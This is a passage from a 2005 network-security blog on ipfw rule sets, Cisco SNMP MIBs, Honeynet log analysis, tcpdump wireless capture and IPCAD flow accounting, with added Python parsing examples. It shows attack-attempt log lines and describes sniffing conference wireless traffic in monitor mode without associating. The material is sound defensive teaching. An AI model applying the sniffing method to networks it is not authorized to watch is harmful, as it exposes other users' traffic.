05000 deny icmp from any to any
drury:/root# ipfw list
05000 deny icmp from any to any
65535 deny ip from any to any

If I flush the rules, only the default rule (65535) at the bottom remains:

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
65535 deny ip from any to any

Now I add a set 31 rule. The syntax would be something like this:

drury:/root# ipfw add 10000 set 31 allow ip from 192.168.1.0/24 to any
10000 allow ip from 192.168.1.0/24 to any
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

This adds rule number 10000 with set 31. It allows any traffic from a defined subnet. Now I flush the rules and check the results.

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

I can rid myself of the set 31 rule using this method.

drury:/root# ipfw delete 10000 disable 31
drury:/root# ipfw list
65535 deny ip from any to any
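
To make the set semantics above concrete without a FreeBSD box at hand, here is an added Python model of ipfw's rule list (my own illustration, not ipfw code or anything from the freebsd-stable thread). It reproduces the three behaviours the transcripts show: rules are evaluated in number order with the first match winning, flush removes everything except set 31 and the default rule, and set-31 rules go away only with an explicit delete, as the manual's "ipfw delete set 31" describes. Rule tuples and the list() format are my own simplification of the real syntax.

```python
import ipaddress

DEFAULT_RULE = 65535   # the catch-all rule ipfw always keeps at the bottom
SAFE_SET = 31          # the set that 'ipfw flush' leaves alone


class Ruleset:
    """Model of ipfw's numbered, set-tagged rule list with first-match semantics."""

    def __init__(self, default_action="deny"):
        # The default rule lives in set 31 and can never be removed.
        self.rules = {DEFAULT_RULE: (SAFE_SET, default_action, "ip", "any", "any")}

    def add(self, number, action, proto, src, dst, set_number=0):
        """ipfw add <number> [set N] <action> <proto> from <src> to <dst>."""
        if not 1 <= number < DEFAULT_RULE:
            raise ValueError("rule numbers must be 1..65534")
        if not 0 <= set_number <= 31:
            raise ValueError("set numbers must be 0..31")
        self.rules[number] = (set_number, action, proto, src, dst)

    def flush(self):
        """ipfw flush: every rule goes, except those in set 31."""
        self.rules = {n: r for n, r in self.rules.items() if r[0] == SAFE_SET}

    def delete(self, number):
        """ipfw delete <number>."""
        if number == DEFAULT_RULE:
            raise ValueError("the default rule cannot be deleted")
        del self.rules[number]

    def delete_set(self, set_number):
        """ipfw delete set N: the explicit way to drop a safety-net rule in set 31."""
        self.rules = {n: r for n, r in self.rules.items()
                      if r[0] != set_number or n == DEFAULT_RULE}

    def list(self):
        """Lines in the shape of 'ipfw list' output."""
        return [f"{n:05d} {a} {p} from {s} to {d}"
                for n, (_, a, p, s, d) in sorted(self.rules.items())]

    def lookup(self, proto, src, dst):
        """Return (rule_number, action) of the first rule matching a packet."""
        for n, (_, action, rproto, rsrc, rdst) in sorted(self.rules.items()):
            if rproto in ("ip", proto) and _addr_matches(rsrc, src) and _addr_matches(rdst, dst):
                return n, action
        raise AssertionError("unreachable: the default rule matches everything")


def _addr_matches(spec, addr):
    """'any' or a CIDR/host spec against a packet address."""
    if spec == "any":
        return True
    return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)


if __name__ == "__main__":
    fw = Ruleset()
    fw.add(10000, "allow", "ip", "192.168.1.0/24", "any", set_number=SAFE_SET)
    fw.add(5000, "deny", "icmp", "any", "any")
    fw.flush()                       # the management-subnet rule survives
    print("\n".join(fw.list()))
    print(fw.lookup("tcp", "192.168.1.20", "10.0.0.1"))   # (10000, 'allow')
    print(fw.lookup("tcp", "10.0.0.5", "10.0.0.1"))       # (65535, 'deny')
```

The lookup calls show why the set-31 rule is a lockout guard: a flush that wipes a half-edited ruleset still leaves traffic from the management subnet matched by rule 10000 before the default deny. Whichever guard you choose, remember to take it down afterwards: delete_set(31) here, or for the at(1) approach, listing the queued job with atq and removing it with atrm.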

On a different subject, Jean Simon mentioned the nextboot utility to specify an alternate kernel after performing an upgrade.

Tuesday, April 19, 2005

TaoSecurity Visits the Pentagon

This morning I was pleased to speak at the Pentagon on behalf of the Network Security Services-Pentagon section of the US Army Information Technology Agency. (I would like to provide a URL, but there's no point linking to sites that return "403.6 Forbidden: IP address rejected" errors!) Doug Steelman, pictured with me in the photo below, invited me to discuss network security monitoring at their Pentagon Security Forum. Last month Erik Birkholz and Steve Andres from Special Ops Security spoke on assessments. Next month Kevin Mandia of Red Cliff Consulting will discuss incident response. Doug and his colleague Mark Orlando were kind enough to take me on a tour of the building and share some of their approaches to detecting intrusions on the Pentagon's networks.

While I will not outline specifics here, I will say I was impressed by the variety of network traffic the Pentagon collects. They are not a single-solution shop that can be beaten by evading one variety of intrusion detection system deployed at the perimeter. Rather, they gather alert, session, and statistical data and have the capability to collect some full content data. I will not name tools, but I was surprised by some of their choices. By this I mean they seemed genuinely interested in novel approaches to identifying and validating security events.

As far as the Pentagon network is concerned, they are literally an ISP in their own right. They have multiple Autonomous Systems (AS') and they connect to the DISA backbone with 100 Mbps ATM links. After September 11th 2001 they decided to reengineer their network to be more disaster-resilient, and they are now deploying a MPLS-based routing design to facilitate this goal. I look forward to meeting and working with this team in the future, and I thank Doug and Mark for being great hosts today.

Monday, April 18, 2005

Researching Cisco Switch Backplane Statistics

While teaching at USENIX last week, I discussed SPAN ports. I mentioned that copying traffic to the SPAN port was less important than moving packets through the switch. One of the students asked if measuring the utilization of the switch backplane would reveal how well the switch was performing the SPAN function. Another student said there was a Simple Network Management Protocol Management Information Base (SNMP MIB) from which backplane statistics could be retrieved. I decided to research this issue as it affects using switches to collect traffic for network security monitoring. (Incidentally, Talisker offers SPAN port configuration advice for all sorts of switches.)

One answer appears in the Cisco document How to Get Catalyst Switch Backplane Utilization Using SNMP. This sounds promising until we read "the information in this document is valid for Cisco Catalyst switches that run Catalyst code only." Since modern Cisco switches run IOS, we seem out of luck.

That document produced several leads. First, it mentioned the CISCO-STACK-MIB. Finding this MIB clued me in to the multitude of MIBs offered by Cisco. They are available via FTP from ftp://ftp.cisco.com/pub/mibs/.

The link to the CISCO-STACK-MIB brought me to the SNMP Object Navigator. This is a really helpful tool. You can search object names and descriptions to receive a list of matching objects and MIBs for terms like backplane.

Another excellent resource is the MIBs Supported by Product tool. For example, here are all of the MIBs supported by the Cisco 2950 switch.

Cisco offers a few other helpful sites. These include the Cisco IOS MIB Tools page. That site has a link labelled MIB Locator. Follow it, select your IOS release, platform family (device), and IOS feature set, and you will learn what MIBs are present. Also useful are SNMP: Frequently Asked Questions About MIBs and the IP Application Services page for SNMP.

Getting back to the original question -- the original Cat OS discussion of the CISCO-STACK-MIB mentioned the sysTraffic Object Name as a place to find backplane information. Specifically, the description reads "Traffic meter value, i.e. the percentage of bandwidth utilization for the previous polling interval." The question now is to find out what Cisco devices support providing this information via SNMP. The View Supporting Images link on the sysTraffic page shows the Cisco IOS images which offer this SNMP value.

According to the results, the Cisco 3550 appears to be the cheapest switch which provides backplane statistics. I guess I won't be able to test this on my 2950! If anyone else managed to try this out, perhaps using snmpwalk from Net-SNMP, please post a comment.

New Honeynet Project Challenge

I saw that the Honeynet Project announced a new Scan of the Month last week. The evidence consists of Apache logs, Linux syslogs, Snort logs, and IPTables firewall logs. Here are examples.

From the Apache access log:

210.116.59.164 - - [13/Mar/2005:04:05:47 -0500]
"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1063 "-" "-"


From the /var/log/messages syslog:

Mar 13 22:50:53 combo sshd(pam_unix)[9356]:
authentication failure; logname= uid=0 euid=0
tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net user=root


From the Snort logs, apparently captured via syslog:

Feb 25 12:21:33 bastion snort: [1:483:5] ICMP PING CyberKit 2.2 Windows
[Classification: Misc activity] [Priority: 3]: {ICMP}
70.81.243.88 -> 11.11.79.100


Finally, from the IPTables logs:

Feb 25 12:11:24 bridge kernel: INBOUND TCP: IN=br0
PHYSIN=eth0 OUT=br0 PHYSOUT=eth1
SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00
PREC=0x00 TTL=47 ID=17159 DF
PROTO=TCP SPT=1629 DPT=139 WINDOW=44620 RES=0x00 SYN URGP=0
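
To show what parsing these logs "efficiently" looks like in practice, here is an added Python example (my own code, nothing from the Honeynet Project or the challenge) that recognises the four formats quoted above and tallies events per source address and per log type. The sample lines are the four excerpts above, re-joined onto single lines; the field names in the returned dictionaries are my own choice.

```python
import re
from collections import Counter

# The four excerpts quoted above from the Scan of the Month logs, one per line.
SAMPLE_LINES = [
    '210.116.59.164 - - [13/Mar/2005:04:05:47 -0500] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1063 "-" "-"',
    'Mar 13 22:50:53 combo sshd(pam_unix)[9356]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net user=root',
    'Feb 25 12:21:33 bastion snort: [1:483:5] ICMP PING CyberKit 2.2 Windows [Classification: Misc activity] [Priority: 3]: {ICMP} 70.81.243.88 -> 11.11.79.100',
    'Feb 25 12:11:24 bridge kernel: INBOUND TCP: IN=br0 PHYSIN=eth0 OUT=br0 PHYSOUT=eth1 SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00 PREC=0x00 TTL=47 ID=17159 DF PROTO=TCP SPT=1629 DPT=139 WINDOW=44620 RES=0x00 SYN URGP=0',
]

SYSLOG_TS = r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ '
APACHE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
SSHD_RE = re.compile(
    SYSLOG_TS + r'sshd\([^)]*\)\[\d+\]: authentication failure;.* rhost=(?P<src>\S*) user=(?P<user>\S*)')
SNORT_RE = re.compile(
    SYSLOG_TS + r'snort: \[(?P<sid>\d+:\d+:\d+)\] (?P<msg>.+?) \[Classification: (?P<cls>[^\]]+)\] '
    r'\[Priority: (?P<pri>\d+)\]: \{(?P<proto>\w+)\} (?P<src>\S+) -> (?P<dst>\S+)')
IPT_RE = re.compile(SYSLOG_TS + r'kernel: (?P<prefix>[^=]*?)\s*IN=')
KV_RE = re.compile(r'\b([A-Z]+)=(\S*)')   # the KEY=VALUE pairs in an iptables LOG line


def parse_line(line):
    """Classify one log line into a flat dict, or return None if no parser matches."""
    line = line.strip()
    if m := APACHE_RE.match(line):
        return {"kind": "apache", "src": m["src"], "method": m["method"],
                "path": m["path"], "status": int(m["status"])}
    if m := SSHD_RE.match(line):
        return {"kind": "sshd", "src": m["src"], "user": m["user"]}
    if m := SNORT_RE.match(line):
        return {"kind": "snort", "src": m["src"], "dst": m["dst"], "sid": m["sid"],
                "msg": m["msg"], "priority": int(m["pri"])}
    if m := IPT_RE.match(line):
        kv = dict(KV_RE.findall(line))
        if "SRC" not in kv:
            return None
        return {"kind": "iptables", "src": kv["SRC"], "dst": kv.get("DST"),
                "proto": kv.get("PROTO"), "dport": int(kv["DPT"]) if kv.get("DPT") else None,
                "prefix": m["prefix"]}
    return None


def summarize(lines):
    """Count events per log type and per source address; note lines nothing understood."""
    by_kind, by_src, unparsed = Counter(), Counter(), 0
    for line in lines:
        event = parse_line(line)
        if event is None:
            unparsed += 1
            continue
        by_kind[event["kind"]] += 1
        by_src[event["src"]] += 1
    return {"by_kind": dict(by_kind), "by_src": dict(by_src), "unparsed": unparsed}


def top_sources(lines, n=10):
    """The n addresses that appear most often across all four log types."""
    return Counter(summarize(lines)["by_src"]).most_common(n)


if __name__ == "__main__":
    import sys
    lines = SAMPLE_LINES if len(sys.argv) == 1 else [l for f in sys.argv[1:] for l in open(f)]
    print(summarize(lines))
    print(top_sources(lines))
```

Run with the four log files as arguments, this is the reduction step: 260,000 lines collapse into a table of source addresses with counts across Web, SSH, IDS and firewall evidence, and the "unparsed" counter tells you how much of the data your patterns never looked at, which is the number to watch before trusting any conclusion drawn from the rest.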


Let's see how much data is in each of the logs. I used 'wc' to count lines in each of the sets of logs.

  • Apache: 7,620
  • Syslog: 3,925
  • Snort: 69,039
  • IPTables: 179,752
  • Total: 260,336

So, we have over 260,000 lines of log entries to review. This seems fairly crazy to me. As an NSM practitioner who advocates collecting session and full content data, I am often criticized by those who consider it too difficult or expensive to collect such forms of network evidence. This Scan of the Month presents the alternative -- working through line after line of text-based log entries. Now what is more expensive, in terms of time and resources?

You might say I would have the same problem analyzing this intrusion using NSM techniques. You might believe Snort would yield the same number of alerts whether configured to emit text-based records via syslog or alerts for presentation by Sguil.

I guarantee I could determine if the system was compromised, and by how many parties, faster using NSM techniques than manual log analysis.

I would also know exactly what network traffic the intruder launched against the target, regardless of whether or not it triggered a Snort alert. I would not have to look at text-based IPTables representations of packet movement. I could instead look at session data, which summarizes the thousands of packets in a flow into a single record.

I believe the winner of this SotM will end up being a Perl or Awk wizard who can parse the logs efficiently to reduce the number of lines to be analyzed.

This is still a useful challenge. If there is any data available at all after a compromise, it is often in the form of Web logs, syslogs, and so on. It is important to know how to interpret such evidence, if that is all there is to analyze. Still -- imagine the possibilities when NSM-based evidence is collected!

Friday, April 15, 2005

Speaking at Net Optics Think Tank Event in May

I will be presenting my thoughts on pervasive network awareness as facilitated by taps at the next Net Optics Think Tank. The event will take place on 18 May 2005 in their Sunnyvale, CA headquarters. I use Net Optics taps to gain access to traffic when performing network security monitoring.

Thursday, April 14, 2005

Red Cliff Article on Web Browser Forensics

I just learned of a new article, Web Browser Forensics, Part 1 by Keith J. Jones and Rohyt Belani of Red Cliff Consulting. This is part one of two articles, and it features a variety of methods to learn about a user's Web browsing history. Any time digital forensics appears in the news, it is often based on discovering a person's Web browsing activities. The Chandra Levy case is the canonical example.

Wireless Traffic Snippets

In my USENIX talk I show how to collect wireless traffic using Tcpdump. In my slides I use a verbose method that only shows a few packets. In the following I'd like to show a variety of traffic available using Tcpdump.

First I tell my wireless card to go into monitor mode and watch channel 1. Then I ask Tcpdump to show me the media types it understands.

orr:/root# ifconfig wi0 mediaopt monitor channel 1 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ethernet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information header)

Now that I see the media types, I select the second option and begin capturing traffic.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11
tcpdump: data link type IEEE802_11
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11 (802.11), capture size 96 bytes

First we see a beacon with the conference wireless access point SSID. Next is one of many clear-to-send packets.

00:21:19.586724 Beacon (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] ESS CH: 1
00:21:19.587160 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Here are more CTSs and a NetBIOS port 137 UDP query.

00:21:19.915245 Clear-To-Send RA:00:0d:54:9c:5c:0b
00:21:19.926293 IP 131.106.56.95.137 > 172.30.0.255.137: NBT UDP PACKET(137):
QUERY; REQUEST; BROADCAST
00:21:19.938333 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

We see our first 802.11 acknowledgement.

00:21:20.273184 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:20.277588 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:20.279822 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Here's our first request to send.

00:21:20.710353 Clear-To-Send RA:00:0d:54:9c:5c:0b
00:21:20.711677 Request-To-Send TA:00:0d:54:9c:5c:0b
00:21:20.712081 Clear-To-Send RA:00:0d:54:9c:5c:0b
...truncated...

I don't know what the LLC packet means, but it's quickly followed by a probe request and response.

00:21:20.858267 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:20.859258 [|llc](LLC 000d)
00:21:20.859604 Acknowledgment RA:00:0d:54:9c:5c:0b
00:21:20.860719 Probe Request () [1.0 2.0 5.5 11.0 Mbit]
00:21:20.862199 Probe Response (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] CH: 1
00:21:20.862469 Acknowledgment RA:00:0f:34:42:b7:20
00:21:20.863118 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

We don't only see broadcast traffic. Here are a couple of TCP packets:

00:21:26.612946 Clear-To-Send RA:00:0d:93:ec:5f:ba
00:21:26.619326 IP 216.239.57.105.80 > 131.106.58.64.1614:
F 126736513:126736513(0) ack 2074693501 win 8190
00:21:26.620840 IP 216.239.57.105.80 > 131.106.58.64.1614:
F 0:0(0) ack 1 win 8190
...truncated...

Here's an ARP request.

00:21:30.564116 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:30.566783 arp who-has 131.106.56.11 tell 131.106.56.32
00:21:30.567184 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Last, here's a DHCP request.

00:21:32.238510 Clear-To-Send RA:00:90:96:a6:6a:70
00:21:32.252827 IP 131.106.56.64.68 > 255.255.255.255.67:
BOOTP/DHCP, Request from 00:90:96:ab:c6:10, length: 300
00:21:32.254038 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:32.275796 Clear-To-Send RA:00:0f:34:42:b7:20

That was the IEEE802_11 media option. Unfortunately, the IEEE802_11_RADIO option does not seem to produce anything useful.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11_RADIO
tcpdump: data link type IEEE802_11_RADIO
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11_RADIO
(802.11 plus BSD radio information header), capture size 96 bytes
00:26:12.788071 [|802.11]
00:26:12.788915 [|802.11]
00:26:12.789331 [|802.11]
...truncated...

This is nothing special, but it does show what you can capture using Tcpdump while not being associated with a wireless network.
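As an added example (not part of the original post), here is a small Python parser for the tcpdump -y IEEE802_11 line format shown above. It counts frame kinds, pulls the SSID out of beacons and probe responses, and collects the station MACs and IP hosts visible while unassociated; the sample lines are constructed to mirror the capture above.

```python
import re
from collections import Counter

# Constructed sample in the form tcpdump -y IEEE802_11 printed above (not a real capture)
SAMPLE = """\
00:21:19.586724 Beacon (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] ESS CH: 1
00:21:19.587160 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:19.926293 IP 131.106.56.95.137 > 172.30.0.255.137: NBT UDP PACKET(137):
00:21:20.277588 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:20.711677 Request-To-Send TA:00:0d:54:9c:5c:0b
00:21:20.860719 Probe Request () [1.0 2.0 5.5 11.0 Mbit]
00:21:20.862199 Probe Response (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] CH: 1
...truncated...
00:21:30.566783 arp who-has 131.106.56.11 tell 131.106.56.32
"""

LINE = re.compile(r"^(\d\d:\d\d:\d\d\.\d+) (.*)$")
# Control frames: tcpdump prints the receiver (RA) or transmitter (TA) address
CONTROL = {"Clear-To-Send": "RA:", "Request-To-Send": "TA:", "Acknowledgment": "RA:"}
# Management frames that carry an SSID in parentheses (empty for a broadcast probe)
MGMT = re.compile(r"^(Beacon|Probe Response|Probe Request) \(([^)]*)\)")

def classify(body):
    """Map the text after the timestamp to (frame kind, detail)."""
    for kind, tag in CONTROL.items():
        if body.startswith(kind):
            return kind, body.split(tag, 1)[1].strip()   # detail = MAC address
    m = MGMT.match(body)
    if m:
        return m.group(1), m.group(2)                    # detail = SSID carried
    if body.startswith("IP "):
        return "IP", body.split()[1].rsplit(".", 1)[0]   # detail = source host
    if body.startswith("arp "):
        return "ARP", body.split()[-1]                   # detail = asking host
    return "Other", body

def summarize(text):
    """Count frame kinds and collect SSIDs, station MACs and IP hosts seen."""
    kinds, ssids, macs, hosts = Counter(), set(), set(), set()
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                                     # skips "...truncated..."
        kind, detail = classify(m.group(2))
        kinds[kind] += 1
        if kind in ("Beacon", "Probe Response") and detail:
            ssids.add(detail)
        elif kind in CONTROL:
            macs.add(detail)
        elif kind in ("IP", "ARP"):
            hosts.add(detail)
    return kinds, ssids, macs, hosts
```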

Wednesday, April 13, 2005

Notes on IPCAD

Tomorrow morning I teach Network Security Monitoring with Open Source Tools at USENIX 05. I've been taking another look at the tools I will be presenting tomorrow to ensure I'm up-to-date on their latest versions and features.

One of the tools I talk about is IPCAD, the IP Cisco Accounting Daemon by Lev Walkin. I discuss IPCAD in the section on statistical data for network security monitoring (NSM) in my book and my talk. I like IPCAD because it presents data just like one sees with the Cisco show ip accounting command. I actually used IPCAD in an incident response scenario several years ago, before I learned of Carter Bullard's Argus.

The version available in the FreeBSD ports tree (net-mgmt/ipcad) requires more entries in the ipcad.conf file than what I present in my book and slides. Here is the ipcad.conf file I created after I installed IPCAD using the FreeBSD port.

capture-ports disable;
interface wi0;
rsh enable at 127.0.0.1;
rsh root@127.0.0.1 admin;
dumpfile = ipcad.dump;
chroot = /var/ipcad;
memory_limit = 1m;

Before starting IPCAD, I created the directory /var/ipcad to hold the ipcad.dump file. Here's how I started IPCAD.

orr:/root# ipcad -drs
Opening wi0... [LCap] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Can't open dump file ipcad.dump
Daemonized.

The -drs meant "daemonize," "import saved accounting table on startup," and "save the active accounting table on exit," respectively. Starting IPCAD opened an rsh server on my loopback address.

orr:/home/richard$ sockstat -4
USER     COMMAND    PID   FD  PROTO  LOCAL ADDRESS    FOREIGN ADDRESS
root     ipcad      736   3   tcp4   127.0.0.1:514    *:*
root     dhclient   551   5   udp4   *:68             *:*
root     sendmail   397   4   tcp4   127.0.0.1:25     *:*
root     sshd       391   4   tcp4   *:22             *:*

Once IPCAD was running, I could query it as shown next. I ignore the "Connection refused" error caused by running an IPv6-enabled TCP/IP stack but not offering the rsh server in an IPv6-enabled manner.

orr:/root# rsh localhost stat
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 833, 5 m average 773 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 32
Memory usage: 0% (2816 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 17 minutes

We can also check the status of our interface. This should look familiar to Cisco fans.

orr:/root# rsh localhost show interface wi0
connect to address ::1: Connection refused
Trying 127.0.0.1...
wi0 is up, line protocol is up
Hardware is Ethernet, address is 0004.e229.3bba
Internet address is 131.106.57.173 255.255.248.0
IP broadcast address is 131.106.63.255
Encapsulation Ethernet, loopback not set
MTU 1500 bytes, BW 11000 Kbit
Input queue: 0 drops
Last administrative status change at Thu Apr 14 02:58:55 2005
5 minute average rate 4208 bits/sec, 1 packets/sec
1914 packets input, 775739 bytes, 0 no buffer
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
704 packets output, 144852 bytes, 0 underruns
0 output errors, 45 collisions, 0 interface resets, 0 restarts

Next I ask IPCAD to display Cisco accounting data.

orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source            Destination       Packets   Bytes
131.106.57.229    255.255.255.255         2     656
192.168.75.1      255.255.255.255         1      60
131.106.57.79     131.106.63.255          6     468
131.106.57.229    239.255.255.250         3     483
131.106.57.229    224.0.0.22              2      80
131.106.57.229    131.106.63.255         39    5237
216.218.215.226   131.106.57.173          6    3329
131.106.57.173    216.218.215.226         8    1147
66.35.250.209     131.106.57.173         16    2255
131.106.57.173    66.35.250.209          15    2039
...edited...
131.106.57.83     224.0.0.251             1      32
0.0.0.0           224.0.0.1               3      84
131.106.56.1      255.255.255.255         1     328
0.0.0.0           255.255.255.255        15    4920

Accounting data age is 2
Accounting data age exact 163
Accounting data saved 1113448566
Interface wi0: received 874, 5 m average 726 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 34
Memory usage: 0% (2992 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 18 minutes

This is very useful data. You can periodically dump these records, and then grep them to see the level of activity of hosts of interest.

You can collect more granular data by changing one line of the ipcad.conf file:

capture-ports enable;

As the ipcad.conf man page states:

capture-ports { enable | disable };

Make ipcad account for UDP/TCP ports, IP protocol and ICMP types on
a per-interface basis. This setting is relevant for RSH and inter-
active export methods only. Capturing UDP and TCP is disabled by
default to maintain historic RSH output format compatibility. To
selectively enable capturing ports on certain interfaces, specify
the capture-ports between the appropriate interface configuration
statements.

After making the change, I stop and start IPCAD.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
No valid entries found in ipcad.dump.
Daemonized.

I clear the accounting database for good measure, pause, and then check some records.

orr:/root# rsh localhost clear ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...
IP accounting cleared
orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source            Destination       Packets   Bytes  SrcPt  DstPt  Proto  IF
207.171.166.48    131.106.57.173         60   82444     80  53255      6  wi0
131.106.57.173    207.171.166.48         37    2102  53255     80      6  wi0
207.171.166.48    131.106.57.173         10    1145     80  57108      6  wi0
131.106.57.173    207.171.166.48          8    1547  57108     80      6  wi0
131.106.56.1      131.106.57.173          1     220     53  59064     17  wi0
131.106.57.173    131.106.56.1            1      60  59064     53     17  wi0
131.106.56.1      131.106.57.173          1      60     53  51547     17  wi0
...edited...
131.106.58.189    224.0.0.251             3    2240   5353   5353     17  wi0
131.106.58.191    131.106.63.255          2     156  49407    137     17  wi0

Interface wi0: received 560, 5 m average 485 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 19
Memory usage: 0% (1672 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 46 minutes

We have gotten closer to the realm of NSM session data here. While we have socket information (source IP, source port, destination IP, destination port), we do not have timestamps. I prefer to leave the port information out of the equation and just keep the IP and byte counts.
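The "periodically dump these records, then grep them" idea above, worked through as an added Python example (not IPCAD's code or the original post's): it parses both forms of "show ip accounting" output, the default four columns and the eight produced by capture-ports enable, then answers the two questions a responder asks first, how much a host of interest sent and received, and which hosts moved the most bytes. The sample output is constructed from the records shown above.

```python
from collections import defaultdict
# Constructed samples mirroring "rsh localhost show ip accounting" output,
# without ports (default) and with capture-ports enable; not real data.
SAMPLE_PLAIN = """\
Source Destination Packets Bytes
216.218.215.226 131.106.57.173 6 3329
131.106.57.173 216.218.215.226 8 1147
66.35.250.209 131.106.57.173 16 2255
131.106.57.173 66.35.250.209 15 2039
131.106.57.229 255.255.255.255 2 656

Accounting data saved 1113448566
Flow entries made: 34
"""
SAMPLE_PORTS = """\
Source Destination Packets Bytes SrcPt DstPt Proto IF
207.171.166.48 131.106.57.173 60 82444 80 53255 6 wi0
131.106.57.173 207.171.166.48 37 2102 53255 80 6 wi0
131.106.56.1 131.106.57.173 1 220 53 59064 17 wi0
131.106.57.173 131.106.56.1 1 60 59064 53 17 wi0
"""

def parse_accounting(text):
    """Yield one dict per record; header, blank and trailing status lines are skipped."""
    for line in text.splitlines():
        f = line.split()
        if len(f) not in (4, 8) or not (f[2].isdigit() and f[3].isdigit()):
            continue
        rec = {"src": f[0], "dst": f[1], "packets": int(f[2]), "bytes": int(f[3])}
        if len(f) == 8:  # capture-ports enable adds socket, protocol and interface columns
            rec.update(sport=int(f[4]), dport=int(f[5]), proto=int(f[6]), ifname=f[7])
        yield rec

def host_activity(text, host):
    """Bytes sent and received by one host of interest (the grep-style question)."""
    sent = received = 0
    for rec in parse_accounting(text):
        if rec["src"] == host:
            sent += rec["bytes"]
        if rec["dst"] == host:
            received += rec["bytes"]
    return sent, received

def top_talkers(text, n=3):
    """Hosts ranked by total bytes in either direction across all records."""
    totals = defaultdict(int)
    for rec in parse_accounting(text):
        totals[rec["src"]] += rec["bytes"]
        totals[rec["dst"]] += rec["bytes"]
    return sorted(totals.items(), key=lambda kv: (-kv[1], kv[0]))[:n]
```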

There is one final aspect of IPCAD that deserves mention. In my book I mention Fprobe and ng_netflow as software-based NetFlow collectors. It turns out that IPCAD has the same functionality. IPCAD can act as a probe and send NetFlow records to a collector like Flow-capture in the Flow-tools collection.

Let's set up Flow-capture to collect NetFlow records:

orr:/root# mkdir -p /nsm/netflow/ipcad/wi0
orr:/root# flow-capture -w /nsm/netflow/ipcad/wi0 localhost/localhost/9995

I verify that Flow-capture is listening on the port I specified:

orr:/root# sockstat -4
USER     COMMAND      PID   FD  PROTO  LOCAL ADDRESS     FOREIGN ADDRESS
root     flow-captu   919   1   udp4   127.0.0.1:9995    *:*

Now I tell IPCAD to export NetFlow records by adding the following to the end of the ipcad.conf file.

netflow export destination 127.0.0.1 9995

Again I shut down IPCAD, restart it, and then clear the records. Notice that IPCAD reports a NetFlow destination.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Configured NetFlow destination at 127.0.0.1:9995
138 elements got from ipcad.dump.
Daemonized.

After a few minutes I check IPCAD's status.

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 548, 5 m average 683 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 193
NetFlow cached flows: 21
Memory usage: 1% (16984 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 1 hour,

